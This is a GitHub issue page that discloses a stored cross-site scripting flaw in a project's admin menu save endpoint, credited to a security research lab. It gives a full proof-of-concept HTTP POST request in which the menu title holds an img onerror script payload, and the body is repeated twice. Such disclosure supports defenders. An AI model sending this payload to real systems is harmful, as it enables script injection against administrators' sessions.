Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
poc POST /admin1/adminMenu/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 145 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/adminMenu/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close
{"id":"","icon":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"sort":0,"path":"test","ifshow":1,"logwriting":1,"theme":"template"}
then you can view xss in url http://192.168.3.129:8091/admin1#adminMenu/index
The text was updated successfully, but these errors were encountered:
find by Chaitin Security Research Lab
Sorry, something went wrong.
No branches or pull requests
url
http://192.168.3.129:8091/admin1#adminMenu/index
poc
POST /admin1/adminMenu/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 145
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/adminMenu/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"id":"","icon":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"sort":0,"path":"test","ifshow":1,"logwriting":1,"theme":"template"}

then you can view xss in url

http://192.168.3.129:8091/admin1#adminMenu/index
The text was updated successfully, but these errors were encountered: